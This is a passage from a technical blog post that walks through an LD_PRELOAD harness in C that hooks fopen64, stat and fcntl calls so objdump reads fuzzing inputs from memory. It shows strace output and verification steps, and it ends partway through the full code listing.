<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Our fopen hook, return a FILE* to the caller, also, if we are opening our</span>
<span class="c1">// target make sure we're not able to write to the file</span>
<span class="kt">FILE</span><span class="o">*</span> <span class="nf">fopen64</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">pathname</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">mode</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Resolve symbol on demand and only once</span>
    <span class="k">if</span> <span class="p">(</span><span class="nb">NULL</span> <span class="o">==</span> <span class="n">real_fopen64</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">real_fopen64</span> <span class="o">=</span> <span class="n">_resolve_symbol</span><span class="p">(</span><span class="s">"fopen64"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Check to see what file we're opening</span>
    <span class="kt">FILE</span><span class="o">*</span> <span class="n">ret</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">strcmp</span><span class="p">(</span><span class="n">FUZZ_TARGET</span><span class="p">,</span> <span class="n">pathname</span><span class="p">))</span> <span class="p">{</span>
        <span class="c1">// We're trying to open our file, make sure it's a read-only mode</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="n">mode</span><span class="p">,</span> <span class="s">"r"</span><span class="p">))</span> <span class="p">{</span>
            <span class="n">printf</span><span class="p">(</span><span class="s">"Attempt to open fuzz-target in illegal mode: '%s'</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">mode</span><span class="p">);</span>
            <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
        <span class="p">}</span>

        <span class="c1">// Open shared memory FILE* and return to caller</span>
        <span class="n">ret</span> <span class="o">=</span> <span class="n">fmemopen</span><span class="p">((</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">INPUT_ADDR</span><span class="p">,</span> <span class="o">*</span><span class="p">(</span><span class="kt">size_t</span><span class="o">*</span><span class="p">)</span><span class="n">INPUT_SZ_ADDR</span><span class="p">,</span> <span class="n">mode</span><span class="p">);</span>
        
        <span class="c1">// Make sure we've never fopen()'d our fuzzing target before</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">faked_fp</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">printf</span><span class="p">(</span><span class="s">"Attempting to fopen64() fuzzing target more than once</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
            <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
        <span class="p">}</span>

        <span class="c1">// Update faked_fp</span>
        <span class="n">faked_fp</span> <span class="o">=</span> <span class="n">ret</span><span class="p">;</span>

        <span class="c1">// Change the filedes to something we know</span>
        <span class="n">ret</span><span class="o">-&gt;</span><span class="n">_fileno</span> <span class="o">=</span> <span class="mi">1337</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">// We're not opening our file, send to regular fopen</span>
    <span class="k">else</span> <span class="p">{</span>
        <span class="n">ret</span> <span class="o">=</span> <span class="n">real_fopen64</span><span class="p">(</span><span class="n">pathname</span><span class="p">,</span> <span class="n">mode</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Return FILE stream ptr to caller</span>
    <span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>You can see we:</p>
<ol>
  <li>Resolve the symbol location if it hasn’t been yet</li>
  <li>Check to see if we’re being called on our fuzzing target input file</li>
  <li>Call <code class="language-plaintext highlighter-rouge">fmemopen()</code> and open the memory buffer where our current input is in memory along with the input’s size</li>
</ol>

<p>You may also notice a few safety checks as well to make sure things don’t go unnoticed. We have a global variable that is <code class="language-plaintext highlighter-rouge">FILE *faked_fp</code> that we initialize to <code class="language-plaintext highlighter-rouge">NULL</code> which let’s us know if we’ve ever opened our input more than once (it wouldn’t be <code class="language-plaintext highlighter-rouge">NULL</code> anymore on subsequent attempts to open it).</p>

<p>We also do a check on the <code class="language-plaintext highlighter-rouge">mode</code> argument to make sure we’re getting a read-only <code class="language-plaintext highlighter-rouge">FILE *</code> back. We don’t want objdump to alter our input or write to it in any way and if it tries to, we need to know about it.</p>

<p>Running our shared object at this point nets us the following output:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>h0mbre@ubuntu:~/blogpost$ LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D fuzzme
objdump: fuzzme: Bad file descriptor
</code></pre></div></div>

<p>My spidey-sense is telling me something tried to interact with a file descriptor of <code class="language-plaintext highlighter-rouge">1337</code>. Let’s run again under <code class="language-plaintext highlighter-rouge">strace</code> and see what happens.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>h0mbre@ubuntu:~/blogpost$ strace -E LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D fuzzme &gt; /tmp/output.txt
</code></pre></div></div>

<p>In the output, we can see some syscalls to <code class="language-plaintext highlighter-rouge">fcntl()</code> and <code class="language-plaintext highlighter-rouge">fstat()</code> both being called with a file descriptor of <code class="language-plaintext highlighter-rouge">1337</code> which obviously doesn’t exist in our objdump process, so we’ve been able to find the problem.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>fcntl(1337, F_GETFD)                    = -1 EBADF (Bad file descriptor)
prlimit64(0, RLIMIT_NOFILE, NULL, {rlim_cur=4*1024, rlim_max=4*1024}) = 0
fstat(1337, 0x7fff4bf54c90)             = -1 EBADF (Bad file descriptor)
fstat(1337, 0x7fff4bf54bf0)             = -1 EBADF (Bad file descriptor)
</code></pre></div></div>

<p>As we’ve already learned, there is no direct export in libc for <code class="language-plaintext highlighter-rouge">fstat()</code>, it’s one of those weird ones like <code class="language-plaintext highlighter-rouge">stat()</code> and we actually have to hook <code class="language-plaintext highlighter-rouge">__fxstat()</code>. So let’s try and hook that to see if it gets called for our <code class="language-plaintext highlighter-rouge">1337</code> file descriptor. The hook function will look like this to start:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Declare prototype for the real __fxstat</span>
<span class="k">typedef</span> <span class="nf">int</span> <span class="p">(</span><span class="o">*</span><span class="n">__fxstat_t</span><span class="p">)(</span><span class="kt">int</span> <span class="n">__ver</span><span class="p">,</span> <span class="kt">int</span> <span class="n">__filedesc</span><span class="p">,</span> <span class="k">struct</span> <span class="n">stat</span> <span class="o">*</span><span class="n">__stat_buf</span><span class="p">);</span>
<span class="n">__fxstat_t</span> <span class="n">real_fxstat</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

<span class="p">...</span>

<span class="c1">// Hook for __fxstat</span>
<span class="kt">int</span> <span class="nf">__fxstat</span> <span class="p">(</span><span class="kt">int</span> <span class="n">__ver</span><span class="p">,</span> <span class="kt">int</span> <span class="n">__filedesc</span><span class="p">,</span> <span class="k">struct</span> <span class="n">stat</span> <span class="o">*</span><span class="n">__stat_buf</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"** __fxstat() called for __filedesc: %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">__filedesc</span><span class="p">);</span>
    <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Now we also still have that <code class="language-plaintext highlighter-rouge">fcntl()</code> to deal with, luckily that hook is straightforward, if someone asks for the <code class="language-plaintext highlighter-rouge">F_GETFD</code> aka, the flags associated with that special <code class="language-plaintext highlighter-rouge">1337</code> file descriptor, we’ll simply return <code class="language-plaintext highlighter-rouge">O_RDONLY</code> as those were the flags it was “opened” with, and we’ll just panic for now if someone calls it for a different file descriptor. This hook looks like this:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Declare prototype for the real __fcntl</span>
<span class="k">typedef</span> <span class="nf">int</span> <span class="p">(</span><span class="o">*</span><span class="n">fcntl_t</span><span class="p">)(</span><span class="kt">int</span> <span class="n">fildes</span><span class="p">,</span> <span class="kt">int</span> <span class="n">cmd</span><span class="p">,</span> <span class="p">...);</span>
<span class="n">fcntl_t</span> <span class="n">real_fcntl</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

<span class="p">...</span>

<span class="c1">// Hook for fcntl</span>
<span class="kt">int</span> <span class="nf">fcntl</span><span class="p">(</span><span class="kt">int</span> <span class="n">fildes</span><span class="p">,</span> <span class="kt">int</span> <span class="n">cmd</span><span class="p">,</span> <span class="p">...)</span> <span class="p">{</span>
    <span class="c1">// Resolve fcntl symbol if needed</span>
    <span class="k">if</span> <span class="p">(</span><span class="nb">NULL</span> <span class="o">==</span> <span class="n">real_fcntl</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">real_fcntl</span> <span class="o">=</span> <span class="n">_resolve_symbol</span><span class="p">(</span><span class="s">"fcntl"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">fildes</span> <span class="o">==</span> <span class="mi">1337</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">return</span> <span class="n">O_RDONLY</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="k">else</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"** fcntl() called for real file descriptor</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Running this under <code class="language-plaintext highlighter-rouge">strace</code> now, the <code class="language-plaintext highlighter-rouge">fcntl()</code> call is absent as we would expect:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>openat(AT_FDCWD, "/usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=26376, ...}) = 0
mmap(NULL, 26376, PROT_READ, MAP_SHARED, 3, 0) = 0x7ff61d331000
close(3)                                = 0
prlimit64(0, RLIMIT_NOFILE, NULL, {rlim_cur=4*1024, rlim_max=4*1024}) = 0
fstat(1, {st_mode=S_IFREG|0664, st_size=0, ...}) = 0
write(1, "** __fxstat() called for __filed"..., 42) = 42
exit_group(0)                           = ?
+++ exited with 0 +++
</code></pre></div></div>

<p>Now we can flesh out our <code class="language-plaintext highlighter-rouge">__fxstat()</code> hook with some logic. The caller is hoping to retrieve a <code class="language-plaintext highlighter-rouge">stat struct</code> from the function for our fuzzing target <code class="language-plaintext highlighter-rouge">fuzzme</code> by passing the special file descriptor <code class="language-plaintext highlighter-rouge">1337</code>. Luckily, we have our global <code class="language-plaintext highlighter-rouge">stat struct</code> that we can return after we update its size to match that of the current input in memory (as tracked by us and the fuzzer as the value at <code class="language-plaintext highlighter-rouge">INPUT_SIZE_ADDR</code>). So if called, we simply update our <code class="language-plaintext highlighter-rouge">stat struct</code> size, and <code class="language-plaintext highlighter-rouge">memcpy</code> our struct into their <code class="language-plaintext highlighter-rouge">*__stat_buf</code>. Our complete hook now looks like this:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Hook for __fxstat</span>
<span class="kt">int</span> <span class="nf">__fxstat</span> <span class="p">(</span><span class="kt">int</span> <span class="n">__ver</span><span class="p">,</span> <span class="kt">int</span> <span class="n">__filedesc</span><span class="p">,</span> <span class="k">struct</span> <span class="n">stat</span> <span class="o">*</span><span class="n">__stat_buf</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Resolve the real fxstat</span>
    <span class="k">if</span> <span class="p">(</span><span class="nb">NULL</span> <span class="o">==</span> <span class="n">real_fxstat</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">real_fxstat</span> <span class="o">=</span> <span class="n">_resolve_symbol</span><span class="p">(</span><span class="s">"__fxstat"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="kt">int</span> <span class="n">ret</span> <span class="o">=</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>

    <span class="c1">// Check to see if we're stat'ing our fuzz target</span>
    <span class="k">if</span> <span class="p">(</span><span class="mi">1337</span> <span class="o">==</span> <span class="n">__filedesc</span><span class="p">)</span> <span class="p">{</span>
        <span class="c1">// Patch the global struct with current input size</span>
        <span class="n">st</span><span class="p">.</span><span class="n">st_size</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="kt">size_t</span><span class="o">*</span><span class="p">)</span><span class="n">INPUT_SZ_ADDR</span><span class="p">;</span>

        <span class="c1">// Copy global stat struct back to caller</span>
        <span class="n">memcpy</span><span class="p">(</span><span class="n">__stat_buf</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">st</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">stat</span><span class="p">));</span>
        <span class="n">ret</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">// Normal stat, send to real fxstat</span>
    <span class="k">else</span> <span class="p">{</span>
        <span class="n">ret</span> <span class="o">=</span> <span class="n">real_fxstat</span><span class="p">(</span><span class="n">__ver</span><span class="p">,</span> <span class="n">__filedesc</span><span class="p">,</span> <span class="n">__stat_buf</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Now if we run this, we actually don’t break and objdump is able exit cleanly under <code class="language-plaintext highlighter-rouge">strace</code>.</p>

<h2 id="wrapping-up">Wrapping Up</h2>
<p>To test whether or not we have done a fair job, we will go ahead and output <code class="language-plaintext highlighter-rouge">objdump -D fuzzme</code> to a file, and then we’ll go ahead and output the same command but with our harness shared object loaded. Lastly, we’ll run <code class="language-plaintext highlighter-rouge">objdump -D /bin/ed</code> and output to a file to see if our harness created the same output.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>h0mbre@ubuntu:~/blogpost$ objdump -D fuzzme &gt; /tmp/fuzzme_original.txt      
h0mbre@ubuntu:~/blogpost$ LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D fuzzme &gt; /tmp/harness.txt 
h0mbre@ubuntu:~/blogpost$ objdump -D /bin/ed &gt; /tmp/ed.txt
</code></pre></div></div>

<p>Then we <code class="language-plaintext highlighter-rouge">sha1sum</code> the files:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>h0mbre@ubuntu:~/blogpost$ sha1sum /tmp/fuzzme_original.txt /tmp/harness.txt /tmp/ed.txt 
938518c86301ab00ddf6a3ef528d7610fa3fd05a  /tmp/fuzzme_original.txt
add4e6c3c298733f48fbfe143caee79445c2f196  /tmp/harness.txt
10454308b672022b40f6ce5e32a6217612b462c8  /tmp/ed.txt
</code></pre></div></div>

<p>We actually get three different hashes, we wanted the harness and <code class="language-plaintext highlighter-rouge">/bin/ed</code> to output the same output since <code class="language-plaintext highlighter-rouge">/bin/ed</code> is the input we loaded into memory.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>h0mbre@ubuntu:~/blogpost$ ls -laht /tmp
total 14M
drwxrwxrwt 28 root   root   128K Apr  3 08:44 .
-rw-rw-r--  1 h0mbre h0mbre 736K Apr  3 08:43 ed.txt
-rw-rw-r--  1 h0mbre h0mbre 736K Apr  3 08:43 harness.txt
-rw-rw-r--  1 h0mbre h0mbre 2.2M Apr  3 08:42 fuzzme_original.txt
</code></pre></div></div>

<p>Ah, they are the same length at least, that must mean there is a subtle difference and <code class="language-plaintext highlighter-rouge">diff</code> shows us why the hashes aren’t the same:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>h0mbre@ubuntu:~/blogpost$ diff /tmp/ed.txt /tmp/harness.txt 
2c2
&lt; /bin/ed:     file format elf64-x86-64
---
&gt; fuzzme:     file format elf64-x86-64
</code></pre></div></div>

<p>The name of the file in the <code class="language-plaintext highlighter-rouge">argv[]</code> array is different, so that’s the only difference. In the end we were able to feed objdump an input file, but have it actually take input from an in-memory buffer in our harness.</p>

<p>One more thing, we actually forgot that objdump closes our file didn’t we! So I went ahead and added a quick <code class="language-plaintext highlighter-rouge">fclose()</code> hook. We wouldn’t have any problems if <code class="language-plaintext highlighter-rouge">fclose()</code> just wanted to free the heap memory associated with our <code class="language-plaintext highlighter-rouge">fmemopen()</code> returned <code class="language-plaintext highlighter-rouge">FILE *</code>; however, it would also probably try to call <code class="language-plaintext highlighter-rouge">close()</code> on that wonky file descriptor as well and we don’t want that. It might not even matter in the end, just want to be safe. Up to the reader to experiment and see what changes. The imaginary fuzzer should restore <code class="language-plaintext highlighter-rouge">FILE *</code> heap memory anyways during its snapshot restoration routine.</p>

<h2 id="conclusion">Conclusion</h2>
<p>There are a million different ways to accomplish this goal, I just wanted to walk you through my thought process. There are actually a lot of cool things you can do with this harness, one thing I’ve done is actually hook <code class="language-plaintext highlighter-rouge">malloc()</code> to fail on large allocations so that I don’t waste fuzzing cycles on things that will eventually timeout. You can also create an <code class="language-plaintext highlighter-rouge">at_exit()</code> choke point so that no matter what, the program executes your <code class="language-plaintext highlighter-rouge">at_exit()</code> function every time it is exiting which can be useful for snapshot resets if the program can take multiple exit paths as you only have to cover the one exit point.</p>

<p>Hopefully this was useful to some! The complete code to the harness is below, happy fuzzing!</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* 
Compiler flags: 
gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
*/</span>

<span class="cp">#define _GNU_SOURCE     </span><span class="cm">/* dlsym */</span><span class="cp">
#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="c1"> /* printf */</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/stat.h&gt;</span><span class="c1"> /* stat */</span><span class="cp">
#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="c1"> /* exit */</span><span class="cp">
#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="c1"> /* __xstat, __fxstat */</span><span class="cp">
#include</span> <span class="cpf">&lt;dlfcn.h&gt;</span><span class="c1"> /* dlsym and friends */</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/mman.h&gt;</span><span class="c1"> /* mmap */</span><span class="cp">
#include</span> <span class="cpf">&lt;string.h&gt;</span><span class="c1"> /* memset */</span><span class="cp">
#include</span> <span class="cpf">&lt;fcntl.h&gt;</span><span class="c1"> /* open */</span><span class="cp">
</span>
<span class="c1">// Filename of the input file we're trying to emulate</span>
<span class="cp">#define FUZZ_TARGET     "fuzzme"
</span>
<span class="c1">// Definitions for our in-memory inputs </span>
<span class="cp">#define INPUT_SZ_ADDR   0x1336000
#define INPUT_ADDR      0x1337000
#define MAX_INPUT_SZ    (1024 * 1024)
</span>
<span class="c1">// For testing purposes, we read /bin/ed into our input buffer to simulate</span>
<span class="c1">// what the fuzzer would do</span>
<span class="cp">#define  TEST_FILE      "/bin/ed"
</span>
<span class="c1">// Our "legit" global stat struct</span>
<span class="k">struct</span> <span class="n">stat</span> <span class="n">st</span><span class="p">;</span>

<span class="c1">// FILE * returned to callers of fopen64() </span>
<span class="kt">FILE</span> <span class="o">*</span><span class="n">faked_fp</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

<span class="c1">// Declare a prototype for the real stat as a function pointer</span>
<span class="k">typedef</span> <span class="nf">int</span> <span class="p">(</span><span class="o">*</span><span class="n">__xstat_t</span><span class="p">)(</span><span class="kt">int</span> <span class="n">__ver</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">__filename</span><span class="p">,</span> <span class="k">struct</span> <span class="n">stat</span> <span class="o">*</span><span class="n">__stat_buf</span><span class="p">);</span>
<span class="n">__xstat_t</span> <span class="n">real_xstat</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

<span class="c1">// Declare prototype for the real fopen and its friend fopen64 </span>
<span class="k">typedef</span> <span class="kt">FILE</span><span class="o">*</span> <span class="p">(</span><span class="o">*</span><span class="n">fopen_t</span><span class="p">)(</span><span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">pathname</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">mode</span><span class="p">);</span>
<span class="n">fopen_t</span> <span class="n">real_fopen</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

<span class="k">typedef</span> <span class="kt">FILE</span><span class="o">*</span> <span class="p">(</span><span class="o">*</span><span class="n">fopen64_t</span><span class="p">)(</span><span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">pathname</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">mode</span><span class="p">);</span>
<span class="n">fopen64_t</span> <span class="n">real_fopen64</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

<span class="c1">// Declare prototype for the real __fxstat</span>
<span class="k">typedef</span> <span class="nf">int</span> <span class="p">(</span><span class="o">*</span><span class="n">__fxstat_t</span><span class="p">)(</span><span class="kt">int</span> <span class="n">__ver</span><span class="p">,</span> <span class="kt">int</span> <span class="n">__filedesc</span><span class="p">,</span> <span class="k">struct</span> <span class="n">stat</span> <span class="o">*</span><span class="n">__stat_buf</span><span class="p">);</span>
<span class="n">__fxstat_t</span> <span class="n">real_fxstat</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

<span class="c1">// Declare prototype for the real __fcntl</span>
<span class="k">typedef</span> <span class="nf">int</span> <span class="p">(</span><span class="o">*</span><span class="n">fcntl_t</span><span class="p">)(</span><span class="kt">int</span> <span class="n">fildes</span><span class="p">,</span> <span class="kt">int</span> <span class="n">cmd</span><span class="p">,</span> <span class="p">...);</span>
<span class="n">fcntl_t</span> <span class="n">real_fcntl</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

<span class="c1">// Returns memory address of *next* location of symbol in library search order</span>
<span class="k">static</span> <span class="kt">void</span> <span class="o">*</span><span class="nf">_resolve_symbol</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">symbol</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Clear previous errors</span>
    <span class="n">dlerror</span><span class="p">();</span>

    <span class="c1">// Get symbol address</span>
    <span class="kt">void</span><span class="o">*</span> <span class="n">addr</span> <span class="o">=</span> <span class="n">dlsym</span><span class="p">(</span><span class="n">RTLD_NEXT</span><span class="p">,</span> <span class="n">symbol</span><span class="p">);</span>

    <span class="c1">// Check for error</span>
    <span class="kt">char</span><span class="o">*</span> <span class="n">err</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
    <span class="n">err</span> <span class="o">=</span> <span class="n">dlerror</span><span class="p">();</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">err</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">addr</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"** Err resolving '%s' addr: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">symbol</span><span class="p">,</span> <span class="n">err</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>
    
    <span class="k">return</span> <span class="n">addr</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Hook for __xstat </span>
<span class="kt">int</span> <span class="nf">__xstat</span><span class="p">(</span><span class="kt">int</span> <span class="n">__ver</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">__filename</span><span class="p">,</span> <span class="k">struct</span> <span class="n">stat</span><span class="o">*</span> <span class="n">__stat_buf</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Resolve the real __xstat() on demand and maybe multiple times!</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">real_xstat</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">real_xstat</span> <span class="o">=</span> <span class="n">_resolve_symbol</span><span class="p">(</span><span class="s">"__xstat"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Assume the worst, always</span>
    <span class="kt">int</span> <span class="n">ret</span> <span class="o">=</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>

    <span class="c1">// Special __ver value check to see if we're calling from constructor</span>
    <span class="k">if</span> <span class="p">(</span><span class="mh">0x1337</span> <span class="o">==</span> <span class="n">__ver</span><span class="p">)</span> <span class="p">{</span>
        <span class="c1">// Patch back up the version value before sending to real xstat</span>
        <span class="n">__ver</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>

        <span class="n">ret</span> <span class="o">=</span> <span class="n">real_xstat</span><span class="p">(</span><span class="n">__ver</span><span class="p">,</span> <span class="n">__filename</span><span class="p">,</span> <span class="n">__stat_buf</span><span class="p">);</span>

        <span class="c1">// Set the real_xstat back to NULL</span>
        <span class="n">real_xstat</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
        <span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">// Determine if we're stat'ing our fuzzing target</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">strcmp</span><span class="p">(</span><span class="n">__filename</span><span class="p">,</span> <span class="n">FUZZ_TARGET</span><span class="p">))</span> <span class="p">{</span>
        <span class="c1">// Update our global stat struct</span>
        <span class="n">st</span><span class="p">.</span><span class="n">st_size</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="kt">size_t</span> <span class="o">*</span><span class="p">)</span><span class="n">INPUT_SZ_ADDR</span><span class="p">;</span>

        <span class="c1">// Send it back to the caller, skip syscall</span>
        <span class="n">memcpy</span><span class="p">(</span><span class="n">__stat_buf</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">st</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">stat</span><span class="p">));</span>
        <span class="n">ret</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">// Just a normal stat, send to real xstat</span>
    <span class="k">else</span> <span class="p">{</span>
        <span class="n">ret</span> <span class="o">=</span> <span class="n">real_xstat</span><span class="p">(</span><span class="n">__ver</span><span class="p">,</span> <span class="n">__filename</span><span class="p">,</span> <span class="n">__stat_buf</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Exploratory hooks to see if we're using fopen() related functions to open</span>
<span class="c1">// our input file</span>
<span class="kt">FILE</span><span class="o">*</span> <span class="nf">fopen</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">pathname</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">mode</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"** fopen() called for '%s'</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">pathname</span><span class="p">);</span>
    <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Our fopen hook, return a FILE* to the caller, also, if we are opening our</span>
<span class="c1">// target make sure we're not able to write to the file</span>
<span class="kt">FILE</span><span class="o">*</span> <span class="nf">fopen64</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">pathname</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">mode</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Resolve symbol on demand and only once</span>
    <span class="k">if</span> <span class="p">(</span><span class="nb">NULL</span> <span class="o">==</span> <span class="n">real_fopen64</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">real_fopen64</span> <span class="o">=</span> <span class="n">_resolve_symbol</span><span class="p">(</span><span class="s">"fopen64"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Check to see what file we're opening</span>
    <span class="kt">FILE</span><span class="o">*</span> <span class="n">ret</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">strcmp</span><span class="p">(</span><span class="n">FUZZ_TARGET</span><span class="p">,</span> <span class="n">pathname</span><span class="p">))</span> <span class="p">{</span>
        <span class="c1">// We're trying to open our file, make sure it's a read-only mode</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="n">mode</span><span class="p">,</span> <span class="s">"r"</span><span class="p">))</span> <span class="p">{</span>
            <span class="n">printf</span><span class="p">(</span><span class="s">"** Attempt to open fuzz-target in illegal mode: '%s'</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">mode</span><span class="p">);</span>
            <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
        <span class="p">}</span>

        <span class="c1">// Open shared memory FILE* and return to caller</span>
